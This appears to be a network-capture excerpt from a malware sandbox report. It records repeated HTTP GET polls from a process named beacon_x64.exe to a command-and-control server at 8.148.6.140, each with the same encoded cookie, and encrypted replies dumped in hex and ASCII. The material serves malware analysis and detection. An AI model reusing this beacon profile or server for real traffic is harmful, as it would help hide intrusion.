Jan 10, 2025 09:26:31.650252104 CET	505	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:31 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 31 75 6f 39 41 6c 45 71 62 65 32 46 38 61 6f 30 6c 76 52 47 77 4f 51 6e 30 79 2f 63 33 49 46 77 49 33 57 39 77 58 2b 63 39 50 33 39 67 4c 45 34 6e 6b 68 2b 77 64 4b 53 2f 30 31 63 67 4a 59 56 48 35 59 68 6a 52 78 4a 62 62 7a 2b 38 73 53 67 61 42 77 39 76 6d 51 66 57 6f 2f 57 65 45 35 71 2f 79 48 77 47 57 35 4b 34 63 34 6e 6c 75 4c 36 31 4a 70 5a 45 6e 2f 76 35 45 58 6c 7a 55 52 56 6d 72 71 2b 78 47 6e 75 79 32 65 55 4e 77 38 63 72 2f 44 4f 46 52 5a 78 43 54 74 46 55 74 39 51 42 36 62 77 6d 78 62 6d 6b 74 45 70 2b 4d 30 2f 51 50 5a 76 62 63 74 51 67 33 54 70 4f 47 6e 32 6b 59 42 45 72 76 72 72 52 35 76 30 4f 37 47 76 65 7a 39 47 34 61 2b 4e 57 49 73 6d 71 64 6f 53 4c 45 5a 43 67 70 73 71 49 74 47 63 6f 30 64 48 74 4b 4f 6b 53 48 33 30 51 4e 4a 35 37 55 64 33 74 52 2f 4a 6d 76 72 45 68 36 34 4b 71 45 6c 73 62 4e 6b 4c 74 50 52 54 4c 64 5a 47 31 41 7a 64 35 45 6d 5a 73 59 4c 74 6b 33 42 72 5a 59 5a 64 32 6c 35 36 5a 79 70 62 37 79 37 4e 34 5a 41 67 Data Ascii: 1uo9AlEqbe2F8ao0lvRGwOQn0y/c3IFwI3W9wX+c9P39gLE4nkh+wdKS/01cgJYVH5YhjRxJbbz+8sSgaBw9vmQfWo/WeE5q/yHwGW5K4c4nluL61JpZEn/v5EXlzURVmrq+xGnuy2eUNw8cr/DOFRZxCTtFUt9QB6bwmxbmktEp+M0/QPZvbctQg3TpOGn2kYBErvrrR5v0O7Gvez9G4a+NWIsmqdoSLEZCgpsqItGco0dHtKOkSH30QNJ57Ud3tR/JmvrEh64KqElsbNkLtPRTLdZG1Azd5EmZsYLtk3BrZYZd2l56Zypb7y7N4ZAg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	50035	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:31.788022995 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:33.370791912 CET	337	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:33 GMT Server: nginx Content-Length: 152 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 48 48 48 47 4f 4a 4b 77 55 65 6b 54 77 74 49 6b 48 53 50 39 77 77 6e 64 34 78 33 65 31 70 67 70 6e 46 49 69 70 54 55 51 59 49 2b 77 6e 52 55 62 66 75 4a 63 58 6d 50 37 49 72 75 49 61 49 4f 41 44 71 67 70 39 30 7a 58 36 70 66 30 52 53 6d 37 52 69 4f 6d 31 39 54 68 66 45 56 41 4c 2f 32 5a 77 65 31 72 57 57 32 2b 70 4f 7a 52 41 67 55 67 6f 31 4e 59 51 71 63 31 33 68 53 70 74 48 2f 4b 77 4a 6b 65 6c 59 5a 57 63 45 54 55 65 34 47 58 62 61 51 61 30 41 3d 3d Data Ascii: HHHGOJKwUekTwtIkHSP9wwnd4x3e1pgpnFIipTUQYI+wnRUbfuJcXmP7IruIaIOADqgp90zX6pf0RSm7RiOm19ThfEVAL/2Zwe1rWW2+pOzRAgUgo1NYQqc13hSptH/KwJkelYZWcETUe4GXbaQa0A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	50036	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:33.522105932 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:34.485897064 CET	505	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:34 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 61 41 79 34 41 4f 51 76 4c 55 73 6c 39 4f 6c 37 33 6b 76 47 50 6b 73 6f 31 68 54 30 37 61 4f 4d 46 56 68 76 46 63 2b 43 36 38 41 78 44 63 5a 6d 73 55 65 74 69 71 36 69 57 4b 49 44 70 65 7a 69 78 52 47 30 73 39 49 62 56 67 73 4e 41 71 4f 32 30 62 68 79 50 30 32 57 44 75 6e 56 39 67 5a 4b 4c 4e 45 46 63 66 6a 4a 79 4b 51 44 59 45 7a 56 30 72 2f 68 57 65 62 44 52 31 77 62 59 4f 32 46 67 2f 4c 59 71 47 37 73 67 47 79 69 30 6b 66 4f 56 72 4a 49 48 62 37 53 58 6d 73 67 6f 58 62 58 51 6c 74 49 75 4f 44 34 2b 78 37 6f 54 31 53 36 73 4b 75 53 41 30 6c 7a 52 33 71 58 54 55 31 31 61 33 64 4d 55 39 62 31 4f 6b 31 7a 61 77 4e 30 71 77 76 64 6d 50 37 47 4c 76 70 7a 63 7a 63 47 47 6c 4e 71 68 6a 53 68 32 48 30 66 72 76 69 4f 4f 39 32 58 4a 36 31 51 78 75 68 54 38 79 65 79 33 6f 2f 31 35 75 62 77 5a 66 66 49 54 52 76 73 6b 68 51 6a 50 44 55 2f 4a 32 35 34 41 6b 75 4b 4c 62 38 35 38 34 62 61 51 6f 48 33 51 58 35 31 33 39 51 78 4b 44 2f 34 43 2f 52 75 68 54 6f 33 Data Ascii: aAy4AOQvLUsl9Ol73kvGPkso1hT07aOMFVhvFc+C68AxDcZmsUetiq6iWKIDpezixRG0s9IbVgsNAqO20bhyP02WDunV9gZKLNEFcfjJyKQDYEzV0r/hWebDR1wbYO2Fg/LYqG7sgGyi0kfOVrJIHb7SXmsgoXbXQltIuOD4+x7oT1S6sKuSA0lzR3qXTU11a3dMU9b1Ok1zawN0qwvdmP7GLvpzczcGGlNqhjSh2H0frviOO92XJ61QxuhT8yey3o/15ubwZffITRvskhQjPDU/J254AkuKLb8584baQoH3QX5139QxKD/4C/RuhTo3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	50037	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:34.609361887 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:38.553550959 CET	465	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:38 GMT Server: nginx Content-Length: 280 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 38 4d 46 47 48 6f 43 44 70 58 4d 75 48 46 6e 4b 31 51 34 66 5a 4e 49 6c 49 37 63 61 55 33 55 71 5a 35 6d 35 6f 66 55 50 52 65 30 67 34 6c 79 57 72 43 36 72 65 35 36 6a 68 56 56 6c 54 51 41 31 71 68 38 4b 68 41 34 71 65 6e 38 6a 47 4c 51 37 68 66 43 7a 2f 6f 67 6a 57 62 35 53 66 79 55 78 38 42 43 55 55 41 7a 6f 58 59 61 38 36 44 69 44 51 68 52 4d 34 39 33 36 2f 33 7a 62 70 48 69 76 4c 39 58 6c 65 52 4c 65 63 4a 32 50 64 7a 4c 4f 63 36 49 73 33 75 56 34 4a 4b 73 47 6b 46 57 65 71 42 46 37 56 72 75 52 53 71 46 47 2f 54 64 4c 76 62 4b 48 2f 7a 69 37 62 6e 50 55 4d 66 76 77 67 6a 34 66 6a 35 7a 73 69 33 64 34 49 7a 4a 46 32 66 57 34 59 6d 4c 68 79 6f 67 38 34 4c 79 71 52 43 7a 78 59 4c 47 44 70 4f 6a 6c 70 4f 78 71 4e 6d 72 78 57 72 6f 71 69 32 51 50 6d 76 78 54 2f 49 66 2b 47 39 31 30 49 44 76 42 38 59 41 5a 32 4d 6f 2f 47 41 3d 3d Data Ascii: 8MFGHoCDpXMuHFnK1Q4fZNIlI7caU3UqZ5m5ofUPRe0g4lyWrC6re56jhVVlTQA1qh8KhA4qen8jGLQ7hfCz/ogjWb5SfyUx8BCUUAzoXYa86DiDQhRM4936/3zbpHivL9XleRLecJ2PdzLOc6Is3uV4JKsGkFWeqBF7VruRSqFG/TdLvbKH/zi7bnPUMfvwgj4fj5zsi3d4IzJF2fW4YmLhyog84LyqRCzxYLGDpOjlpOxqNmrxWroqi2QPmvxT/If+G910IDvB8YAZ2Mo/GA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	50038	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:38.691401005 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:39.643378973 CET	401	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:39 GMT Server: nginx Content-Length: 216 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 2f 63 78 53 42 72 30 66 5a 6a 57 50 53 66 43 41 43 70 7a 74 68 4c 39 53 6b 56 53 30 42 41 70 59 2f 4a 64 4b 71 7a 77 58 37 52 59 51 32 37 6a 44 51 4e 50 54 61 4d 67 45 38 6d 4e 4d 47 59 34 30 4d 6e 73 72 70 5a 61 6a 4c 55 32 4a 51 73 65 53 31 55 49 73 75 39 32 6c 34 70 7a 2f 58 76 31 52 4a 35 70 6e 54 36 46 43 38 59 76 77 32 4f 6b 30 79 39 2f 47 63 68 2b 58 75 45 39 50 68 44 35 6a 4e 31 35 31 5a 59 41 6a 61 6d 63 69 6c 2b 38 44 4d 4e 68 47 54 67 44 73 4b 46 68 65 71 55 56 4a 6b 69 6f 4e 6b 77 36 45 32 76 6f 42 4b 67 74 69 70 46 61 77 4c 78 75 74 6a 44 31 31 2f 32 77 2b 66 46 38 78 34 36 30 43 6c 51 79 74 70 77 37 63 49 6b 68 36 44 51 3d 3d Data Ascii: /cxSBr0fZjWPSfCACpzthL9SkVS0BApY/JdKqzwX7RYQ27jDQNPTaMgE8mNMGY40MnsrpZajLU2JQseS1UIsu92l4pz/Xv1RJ5pnT6FC8Yvw2Ok0y9/Gch+XuE9PhD5jN151ZYAjamcil+8DMNhGTgDsKFheqUVJkioNkw6E2voBKgtipFawLxutjD11/2w+fF8x460ClQytpw7cIkh6DQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	50039	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:39.765594959 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:40.722172022 CET	337	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:40 GMT Server: nginx Content-Length: 152 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 5a 7a 66 4b 6f 71 67 47 6d 41 54 38 49 48 49 59 67 74 63 48 73 32 59 39 6c 63 4d 63 59 63 72 41 34 63 44 43 31 59 4d 78 66 4e 69 48 4f 30 4e 2f 4a 73 79 56 51 6a 35 6a 65 35 58 63 67 69 2b 52 32 71 45 33 58 46 58 77 57 4e 58 6a 42 59 36 2b 45 6e 48 35 78 77 2f 58 76 30 74 57 78 52 32 68 64 67 42 32 49 31 75 4b 47 77 47 71 59 68 48 74 54 43 44 62 75 2f 67 44 38 77 57 67 42 45 71 31 58 65 6e 41 36 43 72 7a 36 30 6a 35 48 6b 70 33 37 35 44 43 50 67 3d 3d Data Ascii: ZzfKoqgGmAT8IHIYgtcHs2Y9lcMcYcrA4cDC1YMxfNiHO0N/JsyVQj5je5Xcgi+R2qE3XFXwWNXjBY6+EnH5xw/Xv0tWxR2hdgB2I1uKGwGqYhHtTCDbu/gD8wWgBEq1XenA6Crz60j5Hkp375DCPg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	50040	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:40.863178968 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:41.842161894 CET	485	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:41 GMT Server: nginx Content-Length: 300 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 39 6d 63 68 69 73 49 59 56 64 64 7a 68 6b 36 68 4e 6e 6b 67 34 52 50 7a 34 63 55 6f 67 2f 37 54 2b 4a 4a 45 49 70 73 37 43 61 54 6b 62 6b 78 34 42 44 4d 69 53 6c 6e 46 30 76 48 75 63 4a 68 6a 2b 5a 32 74 69 65 4f 39 46 73 55 64 73 4c 44 6f 34 37 57 68 78 66 5a 49 67 6b 47 51 69 41 68 4d 50 64 30 63 66 49 31 6d 6d 56 31 6d 52 69 49 46 56 61 5a 61 4c 67 75 41 72 6f 59 67 36 76 48 59 31 75 63 31 48 42 30 48 5a 6f 75 52 6d 49 6c 51 52 34 32 46 55 39 6c 52 6d 6f 45 75 4b 50 65 36 38 61 31 30 53 47 70 48 54 42 42 55 70 30 4a 39 57 6d 55 69 51 5a 2f 49 76 70 76 5a 4a 4a 6e 44 77 6e 58 76 58 63 34 36 7a 62 6e 70 4d 6a 59 4b 49 4a 6f 41 70 6a 72 4f 54 37 58 35 36 5a 6b 44 45 4f 63 65 6b 59 66 56 53 48 6c 6a 69 78 4a 70 62 75 4a 2f 6f 56 49 64 53 78 43 4e 5a 32 66 74 6f 59 63 72 32 64 32 76 6b 63 5a 37 64 39 70 77 42 79 2f 6d 67 38 6e 4e 70 49 4f 35 2b 37 52 55 4f 72 34 6a 52 79 45 66 46 42 45 3d Data Ascii: 9mchisIYVddzhk6hNnkg4RPz4cUog/7T+JJEIps7CaTkbkx4BDMiSlnF0vHucJhj+Z2tieO9FsUdsLDo47WhxfZIgkGQiAhMPd0cfI1mmV1mRiIFVaZaLguAroYg6vHY1uc1HB0HZouRmIlQR42FU9lRmoEuKPe68a10SGpHTBBUp0J9WmUiQZ/IvpvZJJnDwnXvXc46zbnpMjYKIJoApjrOT7X56ZkDEOcekYfVSHljixJpbuJ/oVIdSxCNZ2ftoYcr2d2vkcZ7d9pwBy/mg8nNpIO5+7RUOr4jRyEfFBE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	50041	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:41.953031063 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:42.940922976 CET	465	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:42 GMT Server: nginx Content-Length: 280 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 6c 69 4d 6f 4f 4b 4e 51 65 59 34 6b 35 75 52 34 6a 71 4b 49 50 63 53 6d 67 33 63 36 30 31 57 6a 43 68 65 6c 69 74 46 4a 75 68 58 42 73 78 33 63 6f 49 73 50 36 66 32 34 4d 79 62 2f 50 4e 47 6b 51 68 78 66 4d 53 42 43 72 42 4d 51 50 61 6d 48 46 30 64 34 74 55 50 71 30 48 30 32 54 59 73 6d 6b 6d 38 69 4c 67 70 53 41 4a 37 6d 33 39 34 73 75 32 63 36 2f 54 74 53 6a 46 79 47 75 67 64 50 6e 4e 71 34 36 6c 6d 48 52 57 32 50 78 59 66 44 59 32 45 57 53 67 76 54 2f 51 34 48 2f 6a 50 6f 61 76 42 34 54 4e 41 55 57 6c 43 63 76 4a 43 71 4a 32 46 2f 59 76 5a 6b 69 36 55 30 6e 64 36 77 52 49 58 73 37 38 75 43 53 52 6d 65 44 6e 69 7a 39 4c 42 50 78 48 46 70 50 38 37 71 43 2b 78 48 65 70 43 6d 33 42 50 42 53 31 59 50 43 59 4b 39 69 4e 67 6b 32 38 62 69 4a 6c 70 36 34 56 69 48 55 41 65 45 34 43 30 62 4a 39 73 33 34 58 52 52 6d 54 76 51 45 51 3d 3d Data Ascii: liMoOKNQeY4k5uR4jqKIPcSmg3c601WjChelitFJuhXBsx3coIsP6f24Myb/PNGkQhxfMSBCrBMQPamHF0d4tUPq0H02TYsmkm8iLgpSAJ7m394su2c6/TtSjFyGugdPnNq46lmHRW2PxYfDY2EWSgvT/Q4H/jPoavB4TNAUWlCcvJCqJ2F/YvZki6U0nd6wRIXs78uCSRmeDniz9LBPxHFpP87qC+xHepCm3BPBS1YPCYK9iNgk28biJlp64ViHUAeE4C0bJ9s34XRRmTvQEQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	50042	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:43.068310976 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:44.037074089 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:43 GMT Server: nginx Content-Length: 364 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:26:44.037169933 CET	364	IN	Data Raw: 66 46 79 6a 2f 53 36 56 4a 73 6e 69 6d 53 42 30 55 32 52 73 4f 42 55 73 79 73 48 6c 68 68 2f 6c 58 4a 6f 57 46 38 51 70 38 71 35 78 62 30 71 30 4f 56 68 6d 69 70 56 73 35 57 6c 76 36 32 59 42 66 36 6c 67 7a 63 32 74 4f 57 62 5a 47 6a 4a 35 34 2b Data Ascii: fFyj/S6VJsnimSB0U2RsOBUsysHlhh/lXJoWF8Qp8q5xb0q0OVhmipVs5Wlv62YBf6lgzc2tOWbZGjJ54+ayJI/yeglVHkwPHLgltSsmzreLYUt651HKfmTz/JN6eiqhrD1pMz8mBEk/gjAReaDZezJ/pTGNOV0aepf2W5CddYSe3crNxe2iywozeCxg3Xdes3TDrVAaLKXOr2xuAqH1G/DD9cDhdRW/I4HlCrJiG8zd2+i67s8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	50043	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:44.157594919 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:45.114870071 CET	401	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:44 GMT Server: nginx Content-Length: 216 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 71 61 62 5a 54 37 30 6a 49 4b 2f 47 32 68 6f 37 6a 64 41 7a 61 55 36 71 4b 4a 4e 51 4f 4f 57 47 55 56 46 49 77 67 45 47 68 52 68 66 35 48 44 4f 72 73 69 71 6f 34 4e 77 34 71 36 33 7a 69 4e 53 43 48 34 36 77 36 4e 69 52 54 57 2f 61 52 6f 42 52 45 57 48 30 6a 65 73 4c 71 74 49 2f 6d 61 75 54 68 63 52 68 55 41 62 55 4d 62 4d 55 32 70 58 4e 69 71 4c 35 73 45 76 75 48 43 6f 58 35 65 47 78 57 63 4b 53 6e 48 58 44 51 59 33 58 4d 79 55 70 4b 6b 66 47 63 45 6c 41 38 31 46 49 4b 35 31 31 68 56 74 54 32 56 49 44 71 79 34 6b 50 41 41 6f 76 79 2f 45 6e 70 65 31 43 73 6f 48 43 68 56 4a 61 68 44 62 41 69 6a 71 51 42 75 35 44 78 35 47 46 6f 73 48 67 3d 3d Data Ascii: qabZT70jIK/G2ho7jdAzaU6qKJNQOOWGUVFIwgEGhRhf5HDOrsiqo4Nw4q63ziNSCH46w6NiRTW/aRoBREWH0jesLqtI/mauThcRhUAbUMbMU2pXNiqL5sEvuHCoX5eGxWcKSnHXDQY3XMyUpKkfGcElA81FIK511hVtT2VIDqy4kPAAovy/Enpe1CsoHChVJahDbAijqQBu5Dx5GFosHg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	50044	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:45.239943027 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:46.176141977 CET	569	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:46 GMT Server: nginx Content-Length: 384 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 6a 6d 56 71 57 38 30 2f 62 36 72 59 43 71 34 30 62 4e 72 58 33 38 33 77 72 48 56 43 41 53 6e 57 5a 37 39 4b 37 78 52 38 43 44 75 48 36 39 66 30 64 76 41 7a 2b 64 33 6b 59 42 63 74 51 54 42 72 66 38 47 41 62 6e 53 42 47 45 52 74 54 49 5a 4a 5a 69 32 62 57 63 6e 6e 63 51 62 4f 4d 66 4e 67 39 7a 65 48 41 31 4d 78 75 72 74 35 52 45 6d 62 6c 61 49 65 46 4e 6f 56 74 47 74 6c 74 4a 58 38 6d 44 48 61 4c 59 48 62 6e 4e 2f 53 74 53 55 47 70 34 7a 2f 38 39 68 6c 4f 6e 6c 63 32 30 42 4f 34 6f 4e 69 64 63 4f 53 53 49 32 32 35 68 6d 64 67 62 71 73 34 69 6c 34 78 76 77 41 69 58 56 72 35 6e 4b 32 50 44 2b 34 37 50 45 38 79 61 44 6c 48 4e 75 78 5a 53 57 72 50 58 36 62 36 44 37 68 68 62 39 44 5a 6b 44 4f 6e 79 6e 5a 6f 41 79 55 59 55 6e 2f 4d 6a 57 4a 50 42 4f 46 68 2b 6c 76 2f 38 58 4a 52 56 4c 30 34 4b 41 4c 36 74 47 77 75 6d 31 68 64 67 35 48 35 2b 4d 47 71 70 55 51 58 4f 50 5a 4c 5a 52 6a 53 4e 69 6a 39 71 72 67 61 4c 36 74 6f 74 6e 6c 7a 41 34 67 7a 64 35 74 78 66 67 36 38 31 53 58 2b 30 67 30 64 69 7a 57 4d 67 [TRUNCATED] Data Ascii: 